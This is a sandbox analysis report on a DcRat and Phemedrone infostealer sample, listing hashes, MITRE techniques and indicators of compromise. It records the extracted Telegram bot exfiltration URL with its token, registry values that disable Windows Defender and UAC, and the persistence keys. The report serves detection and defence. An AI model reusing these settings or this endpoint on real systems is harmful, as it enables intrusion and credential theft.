dcrat | 7bc24cf4fdcb184014b58751e2147d9161517808c3db3779fc41915fb493c87e

Analysis

max time kernel
54s
max time network
63s
platform
windows11-21h2_x64
resource
win11-20241023-uk
resource tags

arch:x64arch:x86image:win11-20241023-uklocale:uk-uaos:windows11-21h2-x64systemwindows
submitted
04/02/2025, 23:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

skillprotectV2.exe
Size

226KB
MD5

309c2c3c3bf0c657af55e0f26117ab03
SHA1

749be0ef8828086b20a292b5e71da4f52e2a9416
SHA256

7bc24cf4fdcb184014b58751e2147d9161517808c3db3779fc41915fb493c87e
SHA512

e81578aff2cd6ff96f5564d043a20682a6e381a03d71e1326c9ef9c896b886956f9bf984e4e75eb232dc692295a12d942938bfbae06515f1b75fdda4af1c1dc5
SSDEEP

3072:UsZpi2QxmGgbGDyyOo9dhtrBTVgwby94wZxJzQyW:Usbi2QxYGDxbL1W91z

Score

10^/10

dcrat phemedrone credential_access defense_evasion discovery evasion execution infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot7944456076:AAGpjhHLrlnhpd2D6D-Z8494fRloZ5j7GY0/sendDocument

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/files/0x0003000000025c36-34.dat	disable_win_def

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Start.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Start.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	Start.exe

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone

Process spawned unexpected child process 48 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2324	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1644	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1588	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4860	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5028	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3660	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4060	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4432	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1520	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3424	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4580	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2472	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	828	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	428	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1688	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3980	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4436	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2392	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3048	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2764	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3884	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3960	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3004	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4960	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1752	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4524	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1308	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5004	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5060	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4632	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1060	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2128	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3192	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1100	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3680	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1304	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2804	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	760	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3064	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3344	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4736	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	892	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2424	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1004	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1076	2332	schtasks.exe	183
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3400	2332	schtasks.exe	183

UAC bypass 3 TTPs 6 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	SteamWebClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	SteamWebClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	SteamWebClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe

Windows security bypass 2 TTPs 7 IoCs

defense_evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86) = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\SkillProtect = "0"	Start.exe

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/3616-620-0x0000000000560000-0x0000000000668000-memory.dmp	dcrat
behavioral1/files/0x001a00000002ab6e-630.dat	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1412	powershell.exe
2688	powershell.exe
2392	powershell.exe
996	powershell.exe
3408	powershell.exe
3424	powershell.exe
5024	powershell.exe
2648	powershell.exe
1872	powershell.exe
728	powershell.exe
3176	powershell.exe
2760	powershell.exe
2716	powershell.exe
3344	powershell.exe
4272	powershell.exe
388	powershell.exe
2164	powershell.exe
4292	powershell.exe
2744	powershell.exe
2348	powershell.exe
388	powershell.exe
132	powershell.exe
1372	powershell.exe
2916	powershell.exe
4076	powershell.exe
1176	powershell.exe
4428	powershell.exe
4960	powershell.exe
1684	powershell.exe
1528	powershell.exe
3324	powershell.exe
3228	powershell.exe
2316	powershell.exe
2328	powershell.exe
940	powershell.exe
964	powershell.exe
2864	powershell.exe
2704	powershell.exe
4292	powershell.exe
4104	powershell.exe
2248	powershell.exe
5032	powershell.exe
568	powershell.exe
1540	powershell.exe
2912	powershell.exe
700	powershell.exe
3232	powershell.exe
1520	powershell.exe
3232	powershell.exe
4652	powershell.exe
3056	powershell.exe
244	powershell.exe
4864	powershell.exe
728	powershell.exe
3228	powershell.exe
388	powershell.exe
1680	powershell.exe
780	powershell.exe
2304	powershell.exe
2348	powershell.exe
2328	powershell.exe
388	powershell.exe
5024	powershell.exe
4272	powershell.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2252	attrib.exe
956	attrib.exe

Executes dropped EXE 9 IoCs

pid	Process
2588	SkillProtectV2.exe
5004	Start.exe
4240	RarExtPackage.exe
1680	CustomJavaSC.exe
4140	sihost.exe
1412	SteamWebHelper.exe
4604	Aida32.exe
3616	SteamWebClient.exe
3528	sppsvc.exe

Loads dropped DLL 6 IoCs

pid	Process
4604	Aida32.exe
4604	Aida32.exe
4604	Aida32.exe
4604	Aida32.exe
4604	Aida32.exe
4604	Aida32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 20 IoCs

defense_evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications\C:\Windows\System32\cmd.exe = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86) = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Start.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	Start.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\SkillProtect = "0"	Start.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications	Start.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtectionSource = "0"	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	Start.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard	Start.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access	Start.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Start.exe

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntoskrnl_04 = "C:\\Program Files\\RUXIM\\sihost.exe"	Start.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ntoskrnl_04 = "C:\\Program Files\\RUXIM\\sihost.exe"	Start.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\ntoskrnl_04 = "C:\\Program Files\\RUXIM\\sihost.exe"	Start.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\services_98 = "C:\\Program Files\\WinRar\\RarExtPackage.exe"	Start.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\spoolsv_28 = "C:\\Program Files\\Java\\CustomJavaSC.exe"	Start.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\spoolsv_28 = "C:\\Program Files\\Java\\CustomJavaSC.exe"	Start.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv_28 = "C:\\Program Files\\Java\\CustomJavaSC.exe"	Start.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv_28 = "C:\\Program Files\\Java\\CustomJavaSC.exe"	Start.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ntoskrnl_04 = "C:\\Program Files\\RUXIM\\sihost.exe"	Start.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services_98 = "C:\\Program Files\\WinRar\\RarExtPackage.exe"	Start.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\services_98 = "C:\\Program Files\\WinRar\\RarExtPackage.exe"	Start.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\services_98 = "C:\\Program Files\\WinRar\\RarExtPackage.exe"	Start.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	SteamWebClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	SteamWebClient.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
2	discord.com
15	discord.com
1	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\services_98 = "C:\\Program Files\\WinRar\\RarExtPackage.exe"	Start.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\spoolsv_28 = "C:\\Program Files\\Java\\CustomJavaSC.exe"	Start.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ntoskrnl_04 = "C:\\Program Files\\RUXIM\\sihost.exe"	Start.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4604 set thread context of 3640	4604	Aida32.exe	186
PID 4604 set thread context of 1864	4604	Aida32.exe	188

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Google\Update\sihost.exe	SteamWebClient.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\StartMenuExperienceHost.exe	SteamWebClient.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\55b276f4edf653	SteamWebClient.exe
File created	C:\Program Files\Google\Chrome\Application\0a1fd5f707cd16	SteamWebClient.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\VC\cmd.exe	SteamWebClient.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\f3b6ecef712a24	SteamWebClient.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dllhost.exe	SteamWebClient.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\5940a34987c991	SteamWebClient.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\VC\ebf1f9fa8afd6d	SteamWebClient.exe
File created	C:\Program Files (x86)\Microsoft\121e5b5079f7c0	SteamWebClient.exe
File created	C:\Program Files\Reference Assemblies\fontdrvhost.exe	SteamWebClient.exe
File created	C:\Program Files\WindowsBootLoad\Start.exe	skillprotectV2.exe
File created	C:\Program Files\RUXIM\sihost.exe	Start.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\StartMenuExperienceHost.exe	SteamWebClient.exe
File created	C:\Program Files\Google\Chrome\Application\sppsvc.exe	SteamWebClient.exe
File created	C:\Program Files (x86)\Google\Update\66fc9ff0ee96c2	SteamWebClient.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\spoolsv.exe	SteamWebClient.exe
File created	C:\Program Files\WinRar\RarExtPackage.exe	Start.exe
File created	C:\Program Files\Java\CustomJavaSC.exe	Start.exe
File created	C:\Program Files (x86)\Microsoft\sysmon.exe	SteamWebClient.exe
File created	C:\Program Files\Reference Assemblies\5b884080fd4f94	SteamWebClient.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File created	C:\Windows\IdentityCRL\INT\wininit.exe	SteamWebClient.exe
File created	C:\Windows\IdentityCRL\INT\56085415360792	SteamWebClient.exe
File created	C:\Windows\diagnostics\index\unsecapp.exe	SteamWebClient.exe
File created	C:\Windows\apppatch\dllhost.exe	SteamWebClient.exe
File created	C:\Windows\apppatch\5940a34987c991	SteamWebClient.exe
File created	C:\Windows\assembly\tmp\cmd.exe	SteamWebClient.exe
File created	C:\Windows\assembly\tmp\ebf1f9fa8afd6d	SteamWebClient.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SkillProtectV2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	AddInProcess32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	AddInProcess32.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	sppsvc.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 49 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1076	schtasks.exe
2324	schtasks.exe
5028	schtasks.exe
2764	schtasks.exe
3960	schtasks.exe
5004	schtasks.exe
2128	schtasks.exe
1304	schtasks.exe
1644	schtasks.exe
4912	schtasks.exe
3884	schtasks.exe
3004	schtasks.exe
1308	schtasks.exe
892	schtasks.exe
1588	schtasks.exe
3660	schtasks.exe
1688	schtasks.exe
1100	schtasks.exe
2804	schtasks.exe
3064	schtasks.exe
3344	schtasks.exe
4860	schtasks.exe
4432	schtasks.exe
2716	schtasks.exe
828	schtasks.exe
428	schtasks.exe
4524	schtasks.exe
3680	schtasks.exe
1520	schtasks.exe
3980	schtasks.exe
4960	schtasks.exe
1060	schtasks.exe
2424	schtasks.exe
1004	schtasks.exe
1032	schtasks.exe
3048	schtasks.exe
4632	schtasks.exe
3192	schtasks.exe
760	schtasks.exe
4736	schtasks.exe
3400	schtasks.exe
3424	schtasks.exe
4436	schtasks.exe
2392	schtasks.exe
1752	schtasks.exe
4060	schtasks.exe
4580	schtasks.exe
2472	schtasks.exe
5060	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2716	powershell.exe
2716	powershell.exe
3344	powershell.exe
3344	powershell.exe
4960	powershell.exe
4960	powershell.exe
5032	powershell.exe
5032	powershell.exe
2348	powershell.exe
2348	powershell.exe
2328	powershell.exe
2328	powershell.exe
388	powershell.exe
388	powershell.exe
3232	powershell.exe
3232	powershell.exe
5024	powershell.exe
5024	powershell.exe
568	powershell.exe
568	powershell.exe
940	powershell.exe
940	powershell.exe
1520	powershell.exe
1520	powershell.exe
2392	powershell.exe
2392	powershell.exe
1684	powershell.exe
1684	powershell.exe
964	powershell.exe
964	powershell.exe
2864	powershell.exe
2864	powershell.exe
2704	powershell.exe
2704	powershell.exe
4292	powershell.exe
4292	powershell.exe
1872	powershell.exe
1872	powershell.exe
1528	powershell.exe
1528	powershell.exe
2588	SkillProtectV2.exe
132	powershell.exe
132	powershell.exe
1372	powershell.exe
1372	powershell.exe
2648	powershell.exe
2648	powershell.exe
1540	powershell.exe
1540	powershell.exe
3324	powershell.exe
3324	powershell.exe
996	powershell.exe
996	powershell.exe
4272	powershell.exe
4272	powershell.exe
728	powershell.exe
728	powershell.exe
4104	powershell.exe
4104	powershell.exe
3228	powershell.exe
3228	powershell.exe
388	powershell.exe
388	powershell.exe
2912	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5004	Start.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	2588	SkillProtectV2.exe
Token: SeDebugPrivilege	5032	powershell.exe
Token: SeBackupPrivilege	5004	Start.exe
Token: SeRestorePrivilege	5004	Start.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	388	powershell.exe
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	964	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	132	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	996	powershell.exe
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeDebugPrivilege	728	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	388	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	3176	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	3408	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	1412	SteamWebHelper.exe
Token: SeDebugPrivilege	4240	RarExtPackage.exe
Token: SeDebugPrivilege	3640	AddInProcess32.exe
Token: SeDebugPrivilege	3616	SteamWebClient.exe
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	780	powershell.exe
Token: SeDebugPrivilege	3592	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	244	powershell.exe
